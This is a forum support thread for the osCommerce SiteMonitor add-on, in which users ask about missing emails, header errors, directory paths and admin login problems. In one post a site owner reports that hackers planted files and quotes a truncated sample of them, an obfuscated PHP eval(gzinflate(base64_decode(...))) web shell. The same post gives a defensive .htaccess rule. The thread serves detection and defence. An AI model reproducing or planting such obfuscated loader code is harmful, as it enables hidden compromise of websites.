Jump to content
Jack_mcs

SiteMonitor

Recommended Posts

OK thanks for letting me know, I will clear up this bug as time permits and up a version that complies with RFC.

It is a pity that it's been coded this way, as it's a useful contribution, fatally flawed :(


This is a signature that appears on all my posts.  
IF YOU MAKE A POST REQUESTING HELP...please state the exact version
of osCommerce that you are using. THANKS

 
Get the latest current code (community-supported responsive 2.3.4.1BS Edge) here

 

Share this post


Link to post
Share on other sites

Hello,

 

thank you very much for the SiteMonitor Addon, I've installed the last version 2.6 and it works fine. I've just one problem: If the script registers new files, there is no e-mail sent, neither with cronjob nor with manual running. Is there any solution for this problem?

 

help would be much appreciated!

 

Andra

Share this post


Link to post
Share on other sites

thank you very much for the SiteMonitor Addon, I've installed the last version 2.6 and it works fine. I've just one problem: If the script registers new files, there is no e-mail sent, neither with cronjob nor with manual running. Is there any solution for this problem?

The code just uses the admins email system. Be sure you have the to option set in the SiteMonitor settings. See if you can send an email from the email tool in admin.

Share this post


Link to post
Share on other sites

Hello,

 

thank you very much for the SiteMonitor Addon, I've installed the last version 2.6 and it works fine. I've just one problem: If the script registers new files, there is no e-mail sent, neither with cronjob nor with manual running. Is there any solution for this problem?

 

help would be much appreciated!

 

Andra

 

Sorry, i did a misstake in posting, and I don't know how to delete this post.

Edited by AndraX

Share this post


Link to post
Share on other sites

The code just uses the admins email system. Be sure you have the to option set in the SiteMonitor settings. See if you can send an email from the email tool in admin.

 

Thank you for your answer. It depends on the message from the script: If there are no changes found or if there is an missmatch, i get an e-mail. If there are new files found, I get no mail.

 

Andra

Share this post


Link to post
Share on other sites

Thank you for your answer. It depends on the message from the script: If there are no changes found or if there is an missmatch, i get an e-mail. If there are new files found, I get no mail.

 

Andra

The only thing I can think of is that the script is not completing for some reason. In the SiteMonitor settings, check the verbos option and update it (if that option is not already set). Then go to the its admin section and click on the third update button. You should see all of the message displayed there. If it stops before all of the sections have been ran, then there is something in the new files, or wherever it is failing, that is causing the problem.

Share this post


Link to post
Share on other sites

The only thing I can think of is that the script is not completing for some reason. In the SiteMonitor settings, check the verbos option and update it (if that option is not already set). Then go to the its admin section and click on the third update button. You should see all of the message displayed there. If it stops before all of the sections have been ran, then there is something in the new files, or wherever it is failing, that is causing the problem.

Thank you, Jack. The verbos option is active, I tested it oncemore, still the same problem. I get this message:

"Found a new file named images/test/xy.jpg

Found a new file named images/test/xxx.jpg

No deleted files found..."

Nothing more, no mail.

Maybe there is not enough scriptpower on the server... But if there are just missmatches, it works...

 

Still I'm glad about your script, it is very helpful. Thank you.

 

Andra

Share this post


Link to post
Share on other sites

Thanks for any advice

 

Just came into this thread. Installed the latest version and now when I try and enter admin area I get this error

 

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/telepoin/public_html/admin/includes/filenames.php:1) in /home/telepoin/public_html/admin/includes/functions/sessions.php on line 97

 

Warning: Cannot modify header information - headers already sent by (output started at /home/telepoin/public_html/admin/includes/filenames.php:1) in /home/telepoin/public_html/admin/includes/functions/general.php on line 22

 

Been a while since I played in Osc so would appreciate any feedback

 

thanks Geoff


Geoff

 

Telegraph Point 2441

Australia

Share this post


Link to post
Share on other sites

Thank you, Jack. The verbos option is active, I tested it oncemore, still the same problem. I get this message:

"Found a new file named images/test/xy.jpg

Found a new file named images/test/xxx.jpg

No deleted files found..."

Nothing more, no mail.

Maybe there is not enough scriptpower on the server... But if there are just missmatches, it works...

The script isn't finishing. It might be a timeout issue or some file that is causing it to fail. Try excluding all directories. If it runs, add one in at a time, testing as you do until the cause is found.

Share this post


Link to post
Share on other sites

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/telepoin/public_html/admin/includes/filenames.php:1) in /home/telepoin/public_html/admin/includes/functions/sessions.php on line 97

 

Warning: Cannot modify header information - headers already sent by (output started at /home/telepoin/public_html/admin/includes/filenames.php:1) in /home/telepoin/public_html/admin/includes/functions/general.php on line 22

See the link in my signature for that error.

Share this post


Link to post
Share on other sites

See the link in my signature for that error.

 

Thanks , tried that and all OK.

 

Reversed everything and removed site monitor and the error is still there?

 

Any other options?


Geoff

 

Telegraph Point 2441

Australia

Share this post


Link to post
Share on other sites

Thanks , tried that and all OK.

 

Reversed everything and removed site monitor and the error is still there?

 

Any other options?

This is the support thread for SiteMonitor. If you don't have SiteMonitor installed or your problem isn't related to it, you need to post your question in the appropriate thread.

Share this post


Link to post
Share on other sites

This is the support thread for SiteMonitor. If you don't have SiteMonitor installed or your problem isn't related to it, you need to post your question in the appropriate thread.

 

Thanks for nothing

 

I install site monitor into an oSc install that has been working for months and after the install of site monitor I cannot access my admin section.

Perhaps the reason I cannot access my admin section is because of site monitor?


Geoff

 

Telegraph Point 2441

Australia

Share this post


Link to post
Share on other sites

Thanks for nothing

 

I install site monitor into an oSc install that has been working for months and after the install of site monitor I cannot access my admin section.

Perhaps the reason I cannot access my admin section is because of site monitor?

Either you made an error in the installation or you need to clear your browser cache. Sometimes simply closing the browser and restarting it is sometimes enough to stop that error.

 

I'd clear your browser cache first, then recheck the installation steps closely. Site monitor does not change anything that would stop you from accessing your admin pages.


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Share this post


Link to post
Share on other sites

Either you made an error in the installation or you need to clear your browser cache. Sometimes simply closing the browser and restarting it is sometimes enough to stop that error.

 

I'd clear your browser cache first, then recheck the installation steps closely. Site monitor does not change anything that would stop you from accessing your admin pages.

 

Thank you for a helpful reply.

 

I will try as you suggest.

 

My apologies for my post above - it was uncalled for.


Geoff

 

Telegraph Point 2441

Australia

Share this post


Link to post
Share on other sites

Jack, just wanted to say THANKS! I've installed the SiteMonitor on a friend's site and it discovered hacker files recently! They've uploaded several files to all writable directories of the web site. It seems that files have identical content and various filenames such as spill.php, spool.php or sql.php. This is a small preview of those files:

<? eval(gzinflate(base64_decode('DZfHDsTGEUR/xTdJ4IE5wZYFcplzWqaLwZxz5td7D32c6cGg6nX1P//9zz//Ks6k/7N6m7Hsk734M022gsD+lxfZlBd//sHFBbptAZN9DfCOkS7KBD2csD3B6/cdLurl+rFc4fJ0A4YBbhA8818ZJR5/TZB4wHxZRPrTgkPik27AgT7u4aHigaBc2AKjQjPqHcddIBNTflVwsk2pp9LyFS9gGVHI8aNw1G/2SapZF6qaUqu14drNMKrjEGXi3KZgERz+/CachCmy5fu6LnTT8qnvdnZr/OJR/ZGcJH6PPJRVn/Lqpph4bjI70sbJWuZJYFcLr5iDoN9IMSDwAVKL3qh2z2hsSxeVYuywg/weFvlFGp16ItXYntOIHOyIDc2RgFZyDKJUfU8ZDSu86FUYRX7T/KFdm73bC7LWl5alFhS8Pgq3FEBkGwrnaQqmeE014izZSQ0pLx6U5KkpyXEN9Q4R... etc. etc.

Thanks to SiteMonitor, we've noticed quite quickly and deleted those files and added .htaccess with this code:

php_flag engine off
<Files ~ "\.(php*|s?p?html|cgi|pl|ini)$">
deny from all
</Files>

We've also changed CHMOD to 757 because 775 was throwing errors. Few minutes after changing the permissions, I've noticed that new .htaccess files were uploaded to all of those directories so I've deleted them. Setting permissions to 757 is obviously no solution and I have also changed the ftp password - however there was no hacker trace in the ftp log. Would you have a solution how to avoid the above please? Is there a possibility of protecting writable directories? As far as I can tell, files have been patched and many security contributions are in place.


Absinthe Original Liquor Store

Share this post


Link to post
Share on other sites

Jack, just wanted to say THANKS! I've installed the SiteMonitor on a friend's site and it discovered hacker files recently! They've uploaded several files to all writable directories of the web site. It seems that files have identical content and various filenames such as spill.php, spool.php or sql.php. This is a small preview of those files:

 

We've also changed CHMOD to 757 because 775 was throwing errors. Few minutes after changing the permissions, I've noticed that new .htaccess files were uploaded to all of those directories so I've deleted them. Setting permissions to 757 is obviously no solution and I have also changed the ftp password - however there was no hacker trace in the ftp log. Would you have a solution how to avoid the above please? Is there a possibility of protecting writable directories? As far as I can tell, files have been patched and many security contributions are in place.

I'm glad it helped. I'm not following the question thoguh - can't tell what is being uploaded to where. But, in my experience, hackers are able to upload files because of some security hole, like the file manager one. Be sure you have renamed the admin directory and applied the patch to its application_top file. It they are still getting in, you should be able to relate the time the file was added as recorded in the SiteMonitor log with that in the ftp log.

Share this post


Link to post
Share on other sites

They've uploaded .php files to writable directories only. File manager does not exist there and admin was also renamed. Not sure what patch in application_top you mean, could you point me please?


Absinthe Original Liquor Store

Share this post


Link to post
Share on other sites

They've uploaded .php files to writable directories only. File manager does not exist there and admin was also renamed. Not sure what patch in application_top you mean, could you point me please?

There are several fixes floating around. This thread mentions one or two.

Share this post


Link to post
Share on other sites

When I'm in my admin and I go to Sitemonitor. The person who's logged in automaticaly changes in another user I don't recognize. I tested it on two different webshops. One time it changes in c and the other time in i. Please help.

I also cannot go to the admin.

 

Warning: opendir() [function.opendir]: Unable to access /home/username/public_html/ in /public/sites/www.site.nl/inlog/includes/functions/sitemonitor_functions.php on line 419

 

Warning: opendir(/home/username/public_html/) [function.opendir]: failed to open dir: No such file or directory in /public/sites/www.site.nl/inlog/includes/functions/sitemonitor_functions.php on line 419

 

This is also an error I get. If someone can help me thanks!

Edited by abe1983

Share this post


Link to post
Share on other sites

When I'm in my admin and I go to Sitemonitor. The person who's logged in automaticaly changes in another user I don't recognize. I tested it on two different webshops. One time it changes in c and the other time in i. Please help.

I also cannot go to the admin.

This is also an error I get. If someone can help me thanks!

Warning: opendir() [function.opendir]: Unable to access /home/username/public_html/ 

 

Is this the path to your store?:

/home/username/public_html/

 

I think you have to change username in this path..


---------------

regards

sijo

---------------

 

Contrib: JMrating10 - Rate your products / osCommerce VTS - Virus & Threat Scanner

 

(osCommerce VTS now also checks for leading and trailing whitespace and also have a grep function)

Share this post


Link to post
Share on other sites

Is this the path to your store?:

/home/username/public_html/

 

I think you have to change username in this path..

 

Can you give me an example. This line automaticaly stood in the start dir field of the configurationpage of sitemonitor.

Thanks.

Share this post


Link to post
Share on other sites

Can you give me an example. This line automaticaly stood in the start dir field of the configurationpage of sitemonitor.

Thanks.

An example would be...

 

/home/abe1983/public_html/

 

Look in your cPanel -> file manager and at the top left you will likely see the path to your file space in a text box.


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Share this post


Link to post
Share on other sites

An example would be...

 

/home/abe1983/public_html/

 

Look in your cPanel -> file manager and at the top left you will likely see the path to your file space in a text box.

 

I've got now this error:

 

Warning: opendir() [function.opendir]: Unable to access home/public/sites/ in /public/sites/www.deriemenshop.nl/inlog/includes/functions/sitemonitor_functions.php on line 419

 

Warning: opendir(home/public/sites/) [function.opendir]: failed to open dir: No such file or directory in /public/sites/www.deriemenshop.nl/inlog/includes/functions/sitemonitor_functions.php on line 419

 

And I've got still the problem with the inlog with another unknown user?

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×